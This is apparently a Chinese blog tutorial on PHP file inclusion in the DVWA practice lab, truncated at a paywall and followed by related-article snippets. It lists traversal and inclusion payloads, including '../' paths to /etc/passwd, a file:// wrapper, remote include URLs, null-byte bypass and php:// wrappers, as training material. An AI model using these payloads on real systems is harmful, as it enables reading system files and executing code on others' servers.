DVWA之PHP文件包含漏洞(File Inclusion)

最新推荐文章于 2024-05-27 08:00:00 发布
最新推荐文章于 2024-05-27 08:00:00 发布
阅读量1.6w 收藏 19
点赞数 2
分类专栏: Web安全 DVWA 漏洞 渗透 文章标签: 安全 PHP文件包含漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ski_12/article/details/60882602
版权

PHP文件包含漏洞,简单地说,就是在通过函数包含文件时,由于没有对包含的文件名进行有效的过滤处理,被攻击者利用从而导致了包含了Web根目录以外的文件进来,就会导致文件信息的泄露甚至注入了恶意代码。更多的介绍这里就不多说了,直接上正题~


PHP文件包含的几个函数:

include():只有代码执行到该函数时才会包含文件进来,发生错误时只给出一个警告并继续向下执行。

include_once():和include()功能相同,区别在于当重复调用同一文件时,程序只调用一次。

require():只要程序执行就包含文件进来,发生错误时会输出错误结果并终止运行。

require_once():和require()功能相同,区别在于当重复调用同一文件时,程序只调用一次。


文件包含漏洞的一般特征如下:

?page=a.php

?home=a.html

?file=content


目录遍历(Directory traversal)和文件包含(File include)的一些区别:

目录遍历是可以读取web根目录以外的其他目录,根源在于web application的路径访问权限设置不严,针对的是本系统。

文件包含是通过include函数将web根目录以外的目录的文件被包含进来,分为LFI本地文件包含和RFI远程文件包含。


几种经典的测试方法:

?file=../../../../../etc/passwdd

?page=file:///etc/passwd

?home=main.cgi

?page=http://www.a.com/1.php

http://1.1.1.1/../../../../dir/file.txt

(通过多个../可以让目录回到根目录中然后再进入目标目录)


编码绕过字符过滤:

可以使用多种编码方式进行绕过

%00嵌入任意位置

.的利用


向量字典:

用于目录爆破猜测,在Kali的/usr/share/wfuzz/wordlist/vulns中保存有,如:

general:目录猜解

Injections:注入

Stress:压力测试

······



Low级:

直接通过将include.php改为../../../../../etc/passwd:


../实现向上一级目录跳转,多个时就会返回到根目录,其数量应多一点。


通过绝对路径也可以直接访问得到:

最低0.47元/天 解锁文章
Mi1k7ea
关注
  • 2
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
DVWA靶机通关攻略第四关——文件包含
小飞飞的博客
03-11 659
DVWA靶机的文件包含详细教学
DVWA——文件包含
小纯的博客
03-21 3152
File Inclusion学习文件包含简介实战:DVWA——文件包含 文件包含简介 一、文件包含简介: 服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时间。这意味着您可以创建供所有网页引用的标准页眉或菜单文件。当页眉需要更新时,您只更新一个包含文件就可以了,或者当您向网站添加一张新页面时,仅仅需要修改一下菜单文件(而不是更新所有网页中的链接)。 二、文件包含函数: PHP文件包含函数有以下四种:require()、require_on
DVWA-文件包含漏洞
热门推荐
qq_43660551的博客
03-05 1万+
文件包含:当服务器开启allow_url_include选项时,可以通过某些特性函数如:include() , require() , include_once() , require_once() 利用url去动态地包含文件,若未对文件进行来源审查,就会导致任意文件读取或者任意命令执行。 分类: (1)本地文件包含 (2)远程文件包含:因为开启了PHP配置中的allow_url_fopen选项,服务器允许包含一个远程文件。 一、low 看下服务器端核心代码:page为做任何过滤。
文件包含漏洞:pikachu与DVWA靶场中的文件包含漏洞通关
最新发布
qq_68163788的博客
05-27 1153
文件包含漏洞是一种常见的Web安全漏洞,攻击者可以通过包含恶意文件来执行任意代码或获取敏感信息。在DVWA靶场中,通过利用文件包含漏洞,可以获取系统文件、敏感信息或者执行恶意代码。pikachu可以通过构造恶意文件路径,利用DVWA中的文件包含漏洞来获取管理员权限或者对系统进行攻击。为了防范文件包含漏洞,开发者应该避免直接包含用户输入的文件,并且对输入进行严格的过滤和验证。通过了解和掌握文件包含漏洞的原理和利用方法,可以帮助提高Web应用程序的安全性。
DVWA —— File Inclusion 文件包含
YouTheFreedom的博客
05-22 1580
web 程序中引入一段用户能控制的脚本或代码,并让服务器端执行 include() 等函数通过动态变量的方式引入需要包含的文件,用户能够控制该动态变量,实现本地文件包含或者远程文件包含
php include怎么用,include()使用方法
weixin_30127995的博客
03-12 8986
php include函数应该是我们最常用的方法,include()语句包含并运行指定文件。但是就是因为这个我们可能忽略了他的一些其他用法,本人因为工作需要又重新看了一遍,在此做一下简要记录:1.include与require简单区别当include所包含的文件不存在时,他只是产生一个警告,但是脚本会继续执行。而require引用的文件如果不存在的时候,就会提示错误,并终止脚本运行。2.被包含文件...
DVWA的压缩文件安装包下载
09-30
4. **文件包含漏洞**:在"File Inclusion"环节,你可以看到如何利用错误配置的文件包含功能来读取服务器上的任意文件,甚至执行服务器上的代码。了解如何正确处理文件包含函数可以防止这类攻击。 5. **认证与会话...
DVWA-master.zip
08-22
DVWA的"File Inclusion"部分,你可以学习如何检测和修复这类问题。 5. **命令注入**:当应用程序使用不受信任的输入来构建操作系统命令时,攻击者可能执行任意系统命令。"Command Injection"章节提供了一个实践...
DVWA Web渗透靶机
07-31
3. **文件包含漏洞**:在DVWA的"File Inclusion"练习中,用户可以看到如何通过恶意的URL参数控制服务器加载和执行任意文件,这可能导致敏感信息泄露或服务器被完全控制。 4. **命令注入**:如果应用程序不安全地...
DVWA最新版
03-23
DVWA的"File Inclusion"部分让你了解这类漏洞的危害,学习如何设置严格的文件验证规则以避免此类风险。 命令注入是指攻击者能够注入操作系统命令到应用程序,从而执行恶意操作。在"Command Injection"模块中,你将...
DVWA(Damn Vulnerable Web Application)程序源码v1.9稳定版.zip
02-03
3. **文件包含漏洞**:DVWA的"File Inclusion"模块让用户了解文件包含漏洞的危害。通过不当的动态文件包含,攻击者可能能读取服务器上的任意文件,甚至执行系统命令。 4. **弱认证与会话管理**:DVWA的...
DVWA文件包含漏洞file inclusion
kirito_pio的博客
06-05 1008
文件包含漏洞是在主机要执行的文件中添加包含木马的文件。 low级别和medium级别分别有远程文件包含(RFI)和本地文件包含(LFI),high级别使用了白名单,无法绕过。 1、low级别 1.1 本地文件包含 在https://blog.csdn.net/kirito_pio/article/details/106547336中,完成了对各个级别的文件上传,但是在执行high级别时只进行了上传,不能使用菜,因为图片是静态的文件,不能自己执行,需要等待请求。 图片中包含的一句话脚本如下,可以..
DVWA靶场——File Inclusion(文件包含漏洞)
qq_74806534的博客
01-18 6437
程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无需再次编写,这种调用文件的过程一般被称为文件包含File Inclusion文件包含漏洞),是指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。
文件包含漏洞
苟有恒,必有三更眠,五更起。
12-28 1162
php文件包含漏洞PHP中的文件包含分为本地包含与远程包含,导致文件包含的函数如下: - include() - include_once() - require() - require_once() - fopen() - readfile() - ……本地包含漏洞(LFI)新建一个phpinfo.txt,然后新建一个shell.php,写入:<?php Include("p
php文件包含漏洞 file inclusion vulnerability
whyrookie的博客
09-19 513
0x00 何为文件包含漏洞 开发人员如果在写类似include "a.php"的代码时,如果将a.php写成了可变的值,那么就可以在上面做文章,举个理想的例子: <? include $_GET['a'] ?> 此时可以把url中传入的合法get值篡改成非法值,include进去,这个非法值就被php解释器执行了。 一个更具体的例子: 在访问一个页面时: 此图表明可以传入文件名来形成文件包含效果,如果在此目录建立a.txt并填充内容,则修改page=a.txt就会显示文件内容,此即为...
DVWA笔记(3)--File Inclusion(文件包含)
xiaopan233的博客
02-05 620
file inclusion 文件包含,就是通过php的引入文件的函数,如include,require_once等。访问用户不应该访问到的文件。防御其实也很简单,allow_url_fopen和allow_url_include禁用即可。或者apache的配置中严格限制访问目录即可。 low 乍一看这页面,是通过get方式传值的。我在C盘根目录中建立了一个文件flag.txt。 方式...
php Local File Inclusion的利用方法汇总
note.txt
03-29 710
<br />看的国外的一个paper ,总结一下(截断统一不考虑):<br />1. 包含上传好的文件,jpg、txt、rar等允许的文件。<br />2. 包含各种日志。<br />3. 使用php wrapper,例如php://input、php://filter、data://等。<br />4. 包含 /proc/self/environ ,不熟悉linux,这个就靠大家了。<br />5. 包含SESSION文件,php保存格式 sess_SESSIONID  默认位置是/tmp/和c:/wi
File Inclusion--文件包含漏洞
qq_17762247的博客
05-27 717
一、简介 为了提高代码的复用性,开发人员往往将业务功能封装成模块放入一个文件中,需要的时候包含对应的文件即可。如果包含者为对被包含的文件进行检查,那么很有可能造成灾难性的后果。 File Inclusion分为LFI(Local File Inclusion,本地文件包含)和RFI(Remote File Inclusion,远程文件包含),LFI指使用文件包含函数包含执行本地(Web应用所在主机)文件,利用LFI可以查看系统任意文件内容,如果具备一些条件,也可以执行命令;RFI需要一定的条件,以PHP应用
DVWA文件包含(不同级别)
qq_43452198的博客
04-22 1442
File Inclusion lowmediumhighimpossible 简介 File Inclusion,意思是文件包含漏洞),是指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任...
dvwa文件包含漏洞
05-30
1. 打开 DVWA 平台,进入 "File Inclusion" 选项中找到相关漏洞。 2. 在输入框中输入以下内容: ``` ../../../../../../../etc/passwd ``` 这将尝试包含系统中的 "/etc/passwd" 文件。 3. 点击提交按钮,应用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值